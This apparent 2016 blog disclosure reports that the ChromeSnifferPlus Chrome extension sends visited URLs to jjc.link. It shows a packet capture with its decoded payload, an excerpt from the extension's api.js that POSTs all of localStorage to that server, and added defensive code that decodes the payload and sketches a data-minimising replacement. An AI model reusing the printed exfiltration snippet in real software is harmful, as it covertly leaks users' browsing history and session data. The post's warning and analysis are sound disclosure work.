ChromeSnifferPlus extension suspected of maliciously collecting users' browsing data

眯眯眼 | 2016-01-07 11:09


ChromeSnifferPlus is an open-source website-fingerprinting extension written by a Chinese developer. It detects the open-source software and JS libraries a site is running, and has a user base both in China and abroad.

Under certain conditions the extension sends the URLs the user has visited, in the background, to a server in the United States.

The server URL is

  http://jjc.link/status/v2

**Wireshark capture**

  POST /status/v2 HTTP/1.1
  Host: jjc.link
  Connection: keep-alive
  Content-Length: 1126
  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
  Origin: chrome-extension://modoldoikofeihcogpldkollonflkdic
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  Accept: */*
  Accept-Encoding: gzip,deflate,sdch
  Accept-Language: zh-CN,zh;q=0.8

  ld=%7B%22http%3A%2F%2Fqunaer.com%2F%22%3A%22%7B%5C%22libs%5C%22%3A%5C%22%7B%5C%5C%5C%22%E7%99%BE%E5%BA%A6%E7%BB%9F%E8%AE%A1%5C%5C%5C%22%3A-1%2C%5C%5C%5C%22jQuery%5C%5C%5C%22%3A%5C%5C%5C%221.9.1%5C%5C%5C%22%2C%5C%5C%5C%22jQuery%20UI%5C%5C%5C%22%3A%5C%5C%5C%221.10.3%5C%5C%5C%22%2C%5C%5C%5C%22PHP%5C%5C%5C%22%3A%5C%5C%5C%225.2.17p1%5C%5C%5C%22%2C%5C%5C%5C%22nginx%5C%5C%5C%22%3A-1%7D%5C%22%2C%5C%22add_time%5C%22%3A1451980052484%7D%22%2C%22http%3A%2F%2Fwww.sogou.com%2F%3Frfrom%3Dsoso%22%3A%22%7B%5C%22libs%5C%22%3A%5C%22%7B%5C%5C%5C%22jQuery%5C%5C%5C%22%3A%5C%5C%5C%221.11.0%5C%5C%5C%22%2C%5C%5C%5C%22nginx%5C%5C%5C%22%3A-1%7D%5C%22%2C%5C%22add_time%5C%22%3A1451979843360%7D%22%2C%22http%3A%2F%2Fwww.sogou.com%2Fweb%3Fquery%3Dmanager%26_asf%3Dwww.sogou.com%26_ast%3D%26ie%3Dutf8%26pid%3Ds.idx%26cid%3Ds.idx.se%26rfrom%3Dsoso%26unc%3D%26w%3D01019900%26sut%3D1368%26sst0%3D1451979849303%26lkt%3D7%252C1451979847939%252C1451979849111%22%3A%22%7B%5C%22libs%5C%22%3A%5C%22%7B%5C%5C%5C%22jQuery%5C%5C%5C%22%3A%5C%5C%5C%221.11.0%5C%5C%5C%22%2C%5C%5C%5C%22nginx%5C%5C%5C%22%3A-1%7D%5C%22%2C%5C%22add_time%5C%22%3A1451979854478%7D%22%7D

  HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 05 Jan 2016 07:47:35 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  Content-Encoding: gzip

  14
  ....................
  0


**Decoded packet contents**

  ld={"http://qunaer.com/":"{\"libs\":\"{\\\"百度统计\\\":-1,\\\"jQuery\\\":\\\"1.9.1\\\",\\\"jQuery UI\\\":\\\"1.10.3\\\",\\\"PHP\\\":\\\"5.2.17p1\\\",\\\"nginx\\\":-1}\",\"add_time\":1451980052484}","http://www.sogou.com/?rfrom=soso":"{\"libs\":\"{\\\"jQuery\\\":\\\"1.11.0\\\",\\\"nginx\\\":-1}\",\"add_time\":1451979843360}","http://www.sogou.com/web?query=manager&_asf=www.sogou.com&_ast=&ie=utf8&pid=s.idx&cid=s.idx.se&rfrom=soso&unc=&w=01019900&sut=1368&sst0=1451979849303&lkt=7%2C1451979847939%2C1451979849111":"{\"libs\":\"{\\\"jQuery\\\":\\\"1.11.0\\\",\\\"nginx\\\":-1}\",\"add_time\":1451979854478}"}

  

Across repeated captures, the server's response was always 14/0, so it is fairly safe to conclude this is not some kind of cloud-lookup feature.
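To make the capture above easier to read, here is an added JavaScript example (not code from the original post or from the ChromeSnifferPlus project). It parses a raw HTTP request of the same shape, uses the `Origin: chrome-extension://...` header to attribute the request to an extension ID, and unwraps the `ld=` body, which is the extension's localStorage after three layers of JSON.stringify plus URL encoding, into one record per visited URL. The request and storage contents are constructed samples modelled on the capture; the extension ID and destination host are the ones shown above.

```javascript
// Added example (not from the original post or the ChromeSnifferPlus project).
// Parses a raw HTTP request like the one captured above, attributes it to an
// extension via the Origin header, and decodes the "ld=" body back into a
// readable inventory of what the server receives.

// Constructed sample storage in the same shape as the capture: each key is a
// visited URL; each value is a JSON string whose "libs" field is itself a
// JSON string (three layers of stringify in total).
const sampleStorage = {
  "http://qunaer.com/": JSON.stringify({
    libs: JSON.stringify({ "jQuery": "1.9.1", "PHP": "5.2.17p1", "nginx": -1 }),
    add_time: 1451980052484,
  }),
  "http://www.sogou.com/web?query=manager&ie=utf8": JSON.stringify({
    libs: JSON.stringify({ "jQuery": "1.11.0", "nginx": -1 }),
    add_time: 1451979854478,
  }),
};
const sampleBody = "ld=" + encodeURIComponent(JSON.stringify(sampleStorage));

// Constructed raw request; the Origin and Host values are those in the capture.
const sampleRequest = [
  "POST /status/v2 HTTP/1.1",
  "Host: jjc.link",
  "Origin: chrome-extension://modoldoikofeihcogpldkollonflkdic",
  "Content-Type: application/x-www-form-urlencoded; charset=UTF-8",
  "Content-Length: " + sampleBody.length,
  "",
  sampleBody,
].join("\r\n");

// Split a raw HTTP/1.1 request into request line, headers (lower-cased names) and body.
function parseRequest(raw) {
  const sep = raw.indexOf("\r\n\r\n");
  const head = raw.slice(0, sep).split("\r\n");
  const [method, path] = head[0].split(" ");
  const headers = {};
  for (const line of head.slice(1)) {
    const i = line.indexOf(":");
    headers[line.slice(0, i).toLowerCase()] = line.slice(i + 1).trim();
  }
  return { method, path, headers, body: raw.slice(sep + 4) };
}

// An Origin of chrome-extension://<id> means the request was issued by an
// extension's own pages or background script, not by the site the user was on.
// Chrome extension IDs are 32 letters in the range a-p. Returns null otherwise.
function extensionBeacon(req) {
  const m = /^chrome-extension:\/\/([a-p]{32})$/.exec(req.headers.origin || "");
  if (!m) return null;
  return { extensionId: m[1], host: req.headers.host, path: req.path, method: req.method };
}

// Undo the URL encoding and the three layers of JSON.stringify.
function decodeLdBody(body) {
  if (!body.startsWith("ld=")) throw new Error("not an ld= form body");
  const outer = JSON.parse(decodeURIComponent(body.slice(3)));
  return Object.keys(outer).map((url) => {
    const entry = JSON.parse(outer[url]);   // {"libs": "...", "add_time": n}
    const u = new URL(url);
    return {
      url,
      host: u.hostname,
      hasQuery: u.search.length > 1,        // query strings can carry search terms or IDs
      libs: JSON.parse(entry.libs),         // {"jQuery": "1.9.1", "nginx": -1, ...}
      addTime: new Date(entry.add_time).toISOString(),
    };
  });
}

const req = parseRequest(sampleRequest);
console.log(extensionBeacon(req));
console.log(decodeLdBody(req.body));
```

Fed the real capture, the same decoder turns the first record's `add_time` (1451980052484) into 2016-01-05T07:47:32Z, three seconds before the `Date` header in the server's response above, which is a quick consistency check that the body really was produced at browse time rather than replayed from old storage.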

The author's open-source repository on GitHub is

  https://github.com/justjavac/ChromeSnifferPlus

There is not much code; after going through it, the JS that exfiltrates the information turns out to be

  https://github.com/justjavac/ChromeSnifferPlus/blob/master/js/api.js

**Code snippet**

  // Excerpt from js/api.js. xhr() and callback come from surrounding code not shown here.
  var url = 'http://jjc.link/status/v2';

  // Nothing recorded yet: send nothing.
  if (localStorage.length === 0) {
      return;
  }

  // The whole storage object is serialised to JSON and URL-encoded into one form field, "ld".
  var data = "ld=" + encodeURIComponent(JSON.stringify(localStorage));

  // POSTed to jjc.link; the response is ignored apart from running the callback.
  xhr('POST', url, data, function(data, status, response){
      callback();
  });


This code encodes the whole of Chrome's localStorage and sends it to the jjc.link server. Depending on how a site handles authentication, the private data that could leak includes:

* User IP
* Addresses of visited websites
* Site admin back-ends
* Usernames / passwords
* Session values
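As an added illustration (not part of the original post, and not code from the ChromeSnifferPlus project), the block below puts the shipped pattern next to a hypothetical data-minimising replacement: it sends nothing unless an assumed opt-in flag `telemetry_opt_in` is set, considers only keys that are actually sniff records, and reduces each URL to its origin so the query strings seen in the capture (for example the sogou search parameters) never leave the browser. Storage contents are constructed samples.

```javascript
// Added example (not from the original post or the ChromeSnifferPlus project).
// The shipped code serialises all of localStorage and POSTs it. The minimised
// version below is a hypothetical replacement: opt-in only, record keys only,
// origins instead of full URLs, no timestamps.

const OPT_IN_KEY = "telemetry_opt_in";   // hypothetical flag, assumed to be set from an options page

// Constructed sample storage: two sniff records plus unrelated keys.
const sampleStorage = {
  [OPT_IN_KEY]: "false",
  "http://qunaer.com/": JSON.stringify({
    libs: JSON.stringify({ jQuery: "1.9.1", nginx: -1 }),
    add_time: 1451980052484,
  }),
  "http://www.sogou.com/web?query=manager&ie=utf8": JSON.stringify({
    libs: JSON.stringify({ jQuery: "1.11.0" }),
    add_time: 1451979854478,
  }),
  "last_tab_state": "{\"tab\":42}",     // not a sniff record; must never be sent
};

// True only when a key looks like a sniff record: a URL key whose value is a
// JSON object with a string "libs" field and a numeric "add_time".
function isSniffRecord(key, value) {
  try {
    new URL(key);
    const entry = JSON.parse(value);
    return typeof entry.libs === "string" && typeof entry.add_time === "number";
  } catch (e) {
    return false;
  }
}

// Shipped behaviour, for comparison: everything in storage, verbatim.
function buildFullPayload(storage) {
  return "ld=" + encodeURIComponent(JSON.stringify(storage));
}

// Minimised payload: null when the user has not opted in; otherwise one entry
// per origin holding the detected libraries only.
function buildMinimisedPayload(storage) {
  if (storage[OPT_IN_KEY] !== "true") return null;
  const byOrigin = {};
  for (const key of Object.keys(storage)) {
    if (!isSniffRecord(key, storage[key])) continue;
    const origin = new URL(key).origin;            // scheme + host (+ port); no path, no query
    const libs = JSON.parse(JSON.parse(storage[key]).libs);
    byOrigin[origin] = Object.assign(byOrigin[origin] || {}, libs);
  }
  return "ld=" + encodeURIComponent(JSON.stringify(byOrigin));
}

// Decode either payload back to an object, for inspection.
function decodePayload(body) {
  return JSON.parse(decodeURIComponent(body.slice(3)));
}

console.log(buildMinimisedPayload(sampleStorage));
console.log(decodePayload(buildFullPayload(sampleStorage)));
console.log(decodePayload(buildMinimisedPayload({ ...sampleStorage, [OPT_IN_KEY]: "true" })));
```

Merging records by origin also means a site visited ten times produces one entry rather than ten URLs, which removes the browsing-history aspect of the payload while keeping the "which stacks are in use" signal a fingerprinting tool might legitimately want.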

**For now the purpose behind the author's collection of this information is unknown; users of ChromeSnifferPlus should be careful.**